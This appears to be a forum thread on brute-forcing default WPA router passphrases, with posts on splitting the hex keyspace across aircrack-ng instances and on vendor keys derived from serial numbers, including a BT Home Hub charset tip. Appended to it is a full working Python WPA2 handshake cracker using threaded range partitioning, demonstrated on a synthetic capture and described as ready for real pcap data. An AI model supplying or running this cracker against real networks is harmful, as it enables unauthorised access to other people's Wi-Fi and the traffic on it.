
Thread: Faster ?! (Default) WPA Password Cracker

  1. #1
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    3

    Question Faster ?! (Default) WPA Password Cracker

    The Idea:

    Default WPA passwords are mostly 10 chars (HEXCHARS) -> 0123456789ABCDEF

    OK,

    if you want to make a wordlist, the size of the list will be more than 10Gb! So leave it..

    now... if we grep the source of aircrack-ng and a wordlist maker...

    Modified AirCrack-NG Description/Parameters.

    aircrack-wpa-ng [handshake-file] [Start Password] [End Password]

    and open it like 50 times / threads.

    First .. -> 00000000000 - 1000000000
    Sec .. -> 10000000001 - 2000000000

    ,,
    ,,
    ,,
    ,,
    Last -> F0000000000 -> FFFFFFFFFF

    If you have a fast comp. then we can break it in more threads..

    Is this a solution for WPA cracking without a wordlist?! Or does a brute-forcer exist? I didn't Google it, but I don't think so..

    If the password is found kill all active windows.. and store it in /tmp/WPA-FOUND.txt ..

    :\ I think it's better than creating a 10-char HEXDEC wordlist.. for the USB drive

    If you think it's useful, I'm gonna take a look this week.. and finish it

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Default WPA passwords are mostly 10 chars (HEXCHARS) -> 0123456789ABCDEF
    I'm not sure where you're getting your information, but this is highly incorrect. WPA passwords can be between 8 and 63 characters, and most routers (to my knowledge) don't have a default.

  3. #3
    Senior Member Talkie Toaster's Avatar
    Join Date
    Jun 2008
    Location
    Scotland
    Posts
    131

    Default

    Most HOME routers I've come across use a 10-digit default password, usually derived from some kind of algo applied to the serial number (10 digits can also be made into a 64-bit WEP pass), and 26 digits is getting common too on newer routers.

    Your best hope against these is research. If, for example, you know manufacturer A uses an MD5 hash of the serial number to produce the default password, then you would know to only target a-f and 0-9 (MD5 only outputs hex, so a-f, 0-9); or others use only capital letters in their default password.

    This would all be defeated by the user simply changing their passphrase off the default one; sadly they'd probably change it to a dictionary word.....

    Google, Google, Google, man!
    Also GNUCitizen: check out Adrian Pastor's work with SOHO routers.

    TT
    Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning.

  4. #4
    Member
    Join Date
    Jun 2008
    Posts
    129

    Default

    Quote Originally Posted by Talkie Toaster View Post
    I know I've spoken about this before, but it's one of my favourite subjects: the BTHomeHub.
    I have a new V2.0, the 11n one. There was a rumour doing the rounds that the default WPA2 key doesn't use 0 and 1. I can confirm that my default doesn't have those two numbers, but I haven't used any other BTHH V2.0 to check this. This could mean that it uses 2-9 and a-f, and it's only 10 digits.

    The other thing I have found is that most BT users don't even log into their routers, as they face a page to change their admin login password, and if the page appears then it means they haven't changed their key.

    It's true about the serial number being used to generate the key, and the s/n uses 0-9 and A-Z.

    To the original poster, it may be worth doing a bit of research on the types of router that broadband suppliers use and default password lengths. AOL and Sky in the UK use Netgear, and they have a default algorithm.
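The scheme in post #1 (cut a fixed-length keyspace into ranges, run one worker per range, kill the rest on the first hit) combined with the point of posts #3 and #4 (only enumerate the characters the vendor's derivation can actually emit), as an added example that is not code from this thread, from aircrack-ng, or from any router vendor. It performs the same check aircrack-ng does against a captured handshake: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes), KCK = first 16 bytes of PRF-512(PMK, "Pairwise key expansion", sorted MACs and nonces), and the WPA2/CCMP MIC = HMAC-SHA1 over the EAPOL-Key frame with its MIC field zeroed, truncated to 16 bytes. Everything handshake-related is constructed for the demo and is an assumption, not a real capture: the SSID "TestNet", the MAC addresses, the nonces, the message-2 frame layout and the "default key" 2a4c6e8b3f, as is the 14-character charset 2-9a-f taken from post #4's observation about one router model. For scale: 16^10 is about 1.1 x 10^12 candidates (as a wordlist at 11 bytes per line, roughly 12 TB), 14^10 is about 2.9 x 10^11, and each candidate costs a 4096-round PBKDF2, so the demo only searches a window of 600 candidates around the answer; the range arithmetic is identical for the full space.

```python
"""Partitioned brute force of a WPA2-PSK handshake over a restricted charset (added example).
The handshake here is synthetic (see make_handshake); the crypto is the 802.11i chain."""
import hashlib
import hmac
import struct
import threading
from concurrent.futures import ThreadPoolExecutor

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the MIC
CHARSET = "23456789abcdef"  # assumption: 2-9 and a-f, from post #4's BTHomeHub observation
LENGTH = 10


def pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck(pmk_: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK = first 16 bytes of PTK = PRF-512(PMK, "Pairwise key expansion", sorted MACs + nonces)."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def mic(kck_: bytes, eapol: bytes) -> bytes:
    """WPA2/CCMP (key descriptor v2): HMAC-SHA1 over the frame with its MIC zeroed, first 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck_, zeroed, hashlib.sha1).digest()[:16]


def candidate(index: int, charset: str, length: int) -> str:
    """The index-th fixed-length string over charset (index written in base len(charset))."""
    out = []
    for _ in range(length):
        index, digit = divmod(index, len(charset))
        out.append(charset[digit])
    return "".join(reversed(out))


def index_of(word: str, charset: str) -> int:
    """Inverse of candidate(): where a word sits in the enumeration."""
    n = 0
    for ch in word:
        n = n * len(charset) + charset.index(ch)
    return n


def split(start: int, end: int, parts: int) -> list:
    """Cut [start, end) into up to `parts` near-equal ranges, one per worker."""
    step = max(1, -(-(end - start) // parts))  # ceiling division
    return [(s, min(s + step, end)) for s in range(start, end, step)]


def crack_range(start, end, stop, charset, length, ssid, ap, sta, anonce, snonce, eapol):
    """Try every candidate in [start, end) against the captured MIC; bail out if another worker hit."""
    target = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for i in range(start, end):
        if stop.is_set():
            return None
        word = candidate(i, charset, length)
        if mic(kck(pmk(word, ssid), ap, sta, anonce, snonce), eapol) == target:
            stop.set()  # post #1's "kill all active windows"
            return word
    return None


def crack(start, end, workers, **handshake):
    """One thread per range; OpenSSL's PBKDF2 releases the GIL, so the threads really overlap."""
    stop = threading.Event()
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = [pool.submit(crack_range, s, e, stop, **handshake) for s, e in split(start, end, workers)]
        results = [f.result() for f in futures]
    return next((r for r in results if r), None)


def make_handshake(passphrase: str, ssid: str) -> dict:
    """Constructed test vector: a synthetic message-2 EAPOL-Key frame whose MIC matches passphrase."""
    ap, sta = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # assumed addresses
    anonce, snonce = hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest()
    # descriptor type 2, key info 0x010a (HMAC-SHA1, pairwise, MIC set), key length 16, replay counter 1,
    # then SNonce, zeroed IV/RSC/ID (32 bytes), zeroed MIC (16 bytes), key data length 0
    body = struct.pack(">BHHQ", 2, 0x010A, 16, 1) + snonce + bytes(32) + bytes(16) + b"\x00\x00"
    eapol = struct.pack(">BBH", 1, 3, len(body)) + body  # 802.1X version 1, type 3 = EAPOL-Key
    real = mic(kck(pmk(passphrase, ssid), ap, sta, anonce, snonce), eapol)
    eapol = eapol[:MIC_OFFSET] + real + eapol[MIC_OFFSET + 16:]
    return dict(ssid=ssid, ap=ap, sta=sta, anonce=anonce, snonce=snonce, eapol=eapol)


if __name__ == "__main__":
    hs = make_handshake("2a4c6e8b3f", "TestNet")  # assumed default key and SSID
    print(f"keyspace {len(CHARSET)}^{LENGTH} = {len(CHARSET) ** LENGTH:,} candidates")
    centre = index_of("2a4c6e8b3f", CHARSET)
    print("ranges:", split(centre - 300, centre + 300, 4))
    print("found:", crack(centre - 300, centre + 300, 4, charset=CHARSET, length=LENGTH, **hs))
```

Against a real capture, make_handshake is replaced by the SSID, both MACs, both nonces and the message-2 EAPOL frame parsed from the pcap; nothing else changes. Threads are used rather than processes because hashlib.pbkdf2_hmac releases the GIL while OpenSSL runs the 4096 rounds, which is where nearly all the time goes. The shared Event is what turns post #1's "kill all active windows" into something a pool can honour: an executor cannot abort a running task, so each worker has to check the flag itself. Shrinking the charset from 16 to 14 symbols, as post #4's observation would allow, removes about three quarters of the 16^10 space, and knowing the vendor's derivation (post #3) shrinks it far more than that.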
